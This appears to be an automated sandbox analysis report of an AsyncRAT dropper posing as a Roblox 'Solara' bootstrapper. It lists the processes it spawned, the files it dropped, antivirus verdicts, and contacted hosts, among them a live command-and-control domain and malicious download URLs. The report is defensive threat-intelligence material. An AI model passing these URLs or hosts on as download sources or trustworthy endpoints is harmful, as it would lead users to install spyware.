                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566238 Sample: sDKRz09zM7.exe Startdate: 01/12/2024 Architecture: WINDOWS Score: 100 61 award-adware.gl.at.ply.gg 2->61 63 www.nodejs.org 2->63 65 7 other IPs or domains 2->65 77 Suricata IDS alerts for network traffic 2->77 79 Found malware configuration 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 29 other signatures 2->83 9 sDKRz09zM7.exe 4 2->9         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 4 other processes 2->17 signatures3 process4 file5 55 C:\Users\user\AppData\Roaming\not rat.exe, PE32 9->55 dropped 57 C:\...\BootstrapperV1.23_ModdedByHisako.exe, PE32+ 9->57 dropped 59 C:\Users\user\AppData\...\sDKRz09zM7.exe.log, CSV 9->59 dropped 93 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->93 19 not rat.exe 15 6 9->19         started        24 BootstrapperV1.23_ModdedByHisako.exe 14 8 9->24         started        95 Antivirus detection for dropped file 13->95 97 Multi AV Scanner detection for dropped file 13->97 99 Machine Learning detection for dropped file 13->99 26 WerFault.exe 15->26         started        signatures6 process7 dnsIp8 67 award-adware.gl.at.ply.gg 147.185.221.24, 49720, 49721, 8848 SALSGIVERUS United States 19->67 69 ip-api.com 208.95.112.1, 49708, 80 TUT-ASUS United States 19->69 51 C:\Users\user\AppData\Roaming\svchost.exe, PE32 19->51 dropped 85 Protects its processes via BreakOnTermination flag 19->85 87 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 19->87 89 Adds a directory exclusion to Windows Defender 19->89 28 powershell.exe 23 19->28         started        31 powershell.exe 19->31         started        33 powershell.exe 19->33         started        39 2 other processes 19->39 71 edge-term4-lhr2.roblox.com 128.116.119.3, 443, 49710 ROBLOX-PRODUCTIONUS United States 24->71 73 www.nodejs.org 104.20.22.46, 443, 49711 CLOUDFLARENETUS United States 24->73 75 2 other IPs or domains 24->75 53 \Device\ConDrv, ISO-8859 24->53 dropped 91 Multi AV Scanner detection for dropped file 24->91 35 conhost.exe 24->35         started        37 WerFault.exe 24->37         started        file9 signatures10 process11 signatures12 101 Loading BitLocker PowerShell Module 28->101 41 conhost.exe 28->41         started        43 conhost.exe 31->43         started        45 conhost.exe 33->45         started        47 conhost.exe 39->47         started        49 conhost.exe 39->49         started        process13

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          sDKRz09zM7.exe66%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                          sDKRz09zM7.exe100%AviraTR/Dropper.Gen
                          sDKRz09zM7.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\not rat.exe100%AviraTR/Spy.Gen
                          C:\Users\user\AppData\Roaming\svchost.exe100%AviraTR/Spy.Gen
                          C:\Users\user\AppData\Roaming\not rat.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\svchost.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe75%ReversingLabsByteCode-MSIL.Trojan.Heracles
                          C:\Users\user\AppData\Roaming\not rat.exe92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                          C:\Users\user\AppData\Roaming\svchost.exe92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://discord.com;http://127.0.0.1:6463/rpc?v=110%Avira URL Cloudsafe
                          http://127.0.0.1:6463/rpc?v=10%Avira URL Cloudsafe
                          http://127.0.0.1:64630%Avira URL Cloudsafe
                          http://127.0.0.1:646320%Avira URL Cloudsafe
                          award-adware.gl.at.ply.gg100%Avira URL Cloudmalware
                          https://8049c006.solaraweb-alj.pages.dev/download/static/files/Sola100%Avira URL Cloudmalware
                          https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip100%Avira URL Cloudmalware
                          https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe100%Avira URL Cloudmalware
                          https://8049c006.solaraweb-alj.pages.dev/download/static/files/Solao100%Avira URL Cloudmalware

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          nodejs.org
                          		104.20.22.46
                          		truefalse
                            		high
                            getsolara.dev
                            		104.21.93.27
                            		truefalse
                              		high
                              www.nodejs.org
                              		104.20.22.46
                              		truefalse
                                		high
                                edge-term4-lhr2.roblox.com
                                		128.116.119.3
                                		truefalse
                                  		high
                                  ip-api.com
                                  		208.95.112.1
                                  		truefalse
                                    		high
                                    award-adware.gl.at.ply.gg
                                    		147.185.221.24
                                    		truetrue
                                      		unknown
                                      clientsettings.roblox.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://getsolara.dev/asset/discord.jsonfalse
                                          		high
                                          https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/livefalse
                                            		high
                                            https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msifalse
                                              		high
                                              award-adware.gl.at.ply.ggtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://getsolara.dev/api/endpoint.jsonfalse
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdngsvchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2004/09/policy1psvchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crl.microsoftsvchost.exe, 0000000E.00000002.2615972777.0000029107A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdthm=svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000008.00000002.1617877847.000001D5E9C30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://account.live.com/msangcwamvicesvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.microsoft.copowershell.exe, 00000005.00000002.1478161767.000001A99FA9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1842400688.000001D2688A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ncs.roblox.com/uploadBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBB0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.nodejs.orgBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdouroOOoDsvchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/vs/17/release/vc_redist.x64.exeBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdYBwk=svchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1471543702.000001A99745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1603906589.000001D5E175F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799985750.000001D210070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://Passport.NET/tb_snsvchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdecurisvchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://127.0.0.1:6463/rpc?v=1BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenot rat.exe, 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1448022364.000001A9873F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D16F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863871000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://Passport.NET/tb_svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://discord.comBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfStsvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1448022364.000001A987618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D1919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://account.live.com/msangcwamsvchost.exe, 0000000E.00000003.1560409249.0000029107557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://passport.net/tbsvchost.exe, 0000000E.00000002.2614689488.0000029106CB7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2616206902.0000029107A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfsvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd04/01svchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://getsolara.devBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBAED000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://discord.com;http://127.0.0.1:6463/rpc?v=11BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAAsvchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://Passport.NET/STS&lt;/ds:KeyName&gt;&lt;/ds:KeyInfo&gt;svchost.exe, 0000000E.00000002.2614257252.0000029106CAF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.jsonBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                        		high
                                                                                                                        https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exeBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: malware
                                                                                                                        		unknown
                                                                                                                        https://getsolara.devBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBAE2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://127.0.0.1:64632BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1448022364.000001A987618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1513924048.000001D5D1919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664458722.000001D200229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1886459813.000001B863A99000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.newtonsoft.com/jsonschemaBootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614824394.0000029106CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustpsvchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msiBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBAC000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://127.0.0.1:6463BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://www.nodejs.orgBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurisvchost.exe, 0000000E.00000003.1680341835.0000029107553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1647116196.0000029107553000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trustcsvchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://contoso.com/Licensepowershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910755F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1591579758.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://Passport.NET/STSsvchost.exe, 0000000E.00000003.1680830143.0000029107576000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd4/xmlsvchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://edge-term4-lhr2.roblox.comBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://contoso.com/powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://Passport.NET/tbsvchost.exe, 0000000E.00000003.1617937545.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1617937545.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1680830143.0000029107576000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000000E.00000003.1651775544.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://signup.live.com/signup.aspxsvchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://nodejs.orgBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1471543702.000001A99745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1603906589.000001D5E175F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799985750.000001D210070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1591579758.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000000E.00000002.2615498284.0000029107537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdt:RequestedUsvchost.exe, 0000000E.00000003.1617592394.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 0000000E.00000003.1561328652.000002910752A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 0000000E.00000003.1560202919.0000029107552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1561197433.0000029107556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://8049c006.solaraweb-alj.pages.dev/download/static/files/SolaoBootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsde:Sesvchost.exe, 0000000E.00000003.1592384617.0000029107552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.microsoft.svchost.exe, 0000000E.00000002.2614257252.0000029106C5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://upx.sf.netAmcache.hve.12.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://james.newtonking.com/projects/jsonBootstrapperV1.23_ModdedByHisako.exe.0.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000000E.00000003.1617937545.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1617937545.0000029107555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107559000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2615590950.000002910756E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1653305536.0000029107555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
